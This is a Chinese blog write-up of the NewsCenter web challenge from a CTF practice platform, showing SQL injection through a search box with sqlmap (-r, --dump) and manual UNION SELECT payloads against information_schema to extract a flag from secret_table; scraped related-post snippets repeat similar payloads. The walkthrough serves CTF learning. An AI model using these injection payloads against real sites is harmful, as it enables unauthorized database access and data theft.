攻防世界web进阶区NewsCenter详解

最新推荐文章于 2023-05-22 17:07:42 发布
最新推荐文章于 2023-05-22 17:07:42 发布
阅读量2.6k 收藏 9
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/107394106
版权

攻防世界web进阶区NewsCenter详解

题目

在这里插入图片描述
我们输入搜索,很明显是一个注入
在这里插入图片描述

方法一sqlmap注入

在这里插入图片描述
抓到包之后,存到txt文件中,
在这里插入图片描述
-r获取文件
然后发现可以注入
在这里插入图片描述
接着我们–dump直接获取到flag(比较暴力)
在这里插入图片描述
在这里插入图片描述

方法二手工注入

在这里插入图片描述
前引号为了闭合之前的语句,后面的#为了注释后面的引号
否则都会报错
我们使用orderby 查询有几列
当我们写三时发现可以正常查询,4就不行了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
发现有一些前缀的文章,那么我们使用一些垃圾话将他查询失效
在这里插入图片描述
2和三可以回显
在这里插入图片描述
database数据库为news
在这里插入图片描述
我们查询他的表

woaini' union select 1,group_concat(table_name),database()   from information_schema.tables where table_schema='news'#

我们查询他的列
在这里插入图片描述

woaini' union select 1,group_concat(column_name),database()  from information_schema.columns where table_name='secret_table'#

我们查询fl4g字段
在这里插入图片描述

無名之涟
关注
专栏目录
newscenter_app
02-20
使用异步Web抓取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标题将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 399
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:user@10.42.101.146 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 2001
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界-NewsCenter-(详细操作)做题笔记
qq_43715020的博客
06-10 1955
攻防世界-NewsCenter-(详细操作)做题笔记
攻防世界-NewsCenter详解
Mr_helloword的博客
08-11 5424
NewsCenter 进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入 我们输入1’ and 1=1 #判断有无sql注入发现有 查看列数1’ order by 3 # 联合查询 1’ union select 1,2,3 # 查表: 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 查字段: 1’ union
Web安全(NewsCenter)
m0_56010012的博客
02-28 496
如题目环境报错,稍等片刻刷新即可
攻防世界 web进阶 NewsCenter
trytowritecode的博客
10-11 2493
标题 攻防世界 WEB进阶NewsCenter 最近刚入web这一块想想写了道ctf,新手 勿喷 这也是我第一次写博客 先看题目点开来是这样的界面 说实话一开始没有头绪,看着这个界面觉得很奇怪,但是基于之前写过的几道题我还是按开了F12开发者视图,在里面找了很久没发现什么有用的信息,然后我在想这里有输入框,会不会是xss的题目于是我就写了 发现页面也没有弹窗,于是陷入了漫长的沉思中,然后决定向以往一样先扫个目录看看于是起了dirmap 用 python dirmap.py -i 地址 -lcf
NewsCenter
06-23
ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。在ASP中,开发者可以使用VBScript或JScript编写脚本,服务器端执行这些脚本并返回HTML到客户端浏览器。在【新闻中心...
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python模块、库和其他可重用代码。"newscenter-2.0.4.tar.gz"这个压缩包正是PyPI上一个...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
删除驱动人生后台服务的方法
08-20
卸载驱动人生后,本地服务里会残留驱动人生的后台服务无法删除,占用系统资源。并且启动项软件无法查出这种后台服务。
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
攻防世界NewsCenter】SQL注入解题方法
weixin_43923736的博客
06-20 993
攻防世界NewsCenter】解题方法
电脑右下角自动弹出窗口(弹窗)
enthan809882的博客
02-19 4472
场景 电脑右下角自动弹出窗口,有时是游戏,有时是广告。 每次都手动点关闭特别麻烦,有的弹窗甚至没法点关闭。 基本是中病毒了。 解决方案 任务管理器查看有没有异常的进程。发现有个叫cnewscenter.exe的程序没见过,关闭这个进程看弹窗关闭吗? 果然关闭了,所以确定就是这个进程。 这就ok了吗? 没有这么简单的,因为肯定有程序启动启动这个程序。果然不久又弹出这个窗口了。 在任务管理器里面,右键属性,查看路径是 D:\Program Files\DTLSoft\DriveTheLife\DTLPlugs\
攻防世界 web高手进阶 NewsCenter
weixin_61835841的博客
04-30 1251
一、分析 进入页面,看见了一个网站,看看源代码,网页内容,寻找突破口,可以用御剑进行目录扫描寻找突破口,进行测试发现没有突破口,尝试尝试sql注入。 二、步骤 1.测试是否存在sql注入 如何判断sql注入点 1单引号判断法 搜索框或URL尾端加 ’ 如果报错则可能存在sql注入漏洞,因为字符型or整型都会因为单引号个数不匹配而报错 2,数字型判断是否有注入 and 1=1 返回正确页面 and 1=2 返回错误页面 3,字符型判断是否有注入 ‘ and ...
弹窗dnews_center.exe如何彻底删除
热门推荐
qq_41592706的博客
07-30 2万+
最近任务栏老是莫名其妙的弹出来个提醒,关掉后没过多久又出现。 今天专门花时间研究一下这个到底是什么 现象是这样的: 点开之后是一个广告界面,很花哨很性感!上班被同事看到很不好,于是我有了关掉它的想法。。 当你关掉后浏览器后,没过多久或者重启电脑后还可以见到他。 为了搞清楚这个是什么东西,我们把鼠标放到这个美女脸上,显示是dnews_center.exe;顿时晓得了这个是隐藏起来的进程; 好吧,美女虽好但是他是个广告而已,每天打开电脑就会出现,那么我们今天就和他拜拜。 1.右键任务栏空白处,
雷神笔记本关闭跳出垃圾游戏广告
weixin_44217936的博客
07-16 1474
当跳出垃圾广告的时候,不要急着将他关掉,在任务管理器进程当中找到他,名字为cnewscenter.exe,并定位所在文件夹的位置,再打开服务,找到了LThunderobotSvc,就是雷神驱动管理的服务。右键停止服务。然后在雷神驱动文件夹里找到uninstall卸载。就不会有弹窗广告了。 ...
攻防世界NewsCenter思路
yangker12148的博客
05-28 7031
打开环境后发现是这样一个页面 考虑到xss或者sql注入,尝试了alert无果,便试试sql注入,随便输入aaa后使用burp抓包 将这些保存在1.txt里,用sqlmap抓包,命令:sqlmap.py -r 1.txt --dbs 这里看到一个news,在继续,命令:sqlmap.py -r 1.txt -D news --dump 最后就得到flag啦!!! ...
攻防世界 - NewsCenter - WriteUp
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界 newscenter
最新发布
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值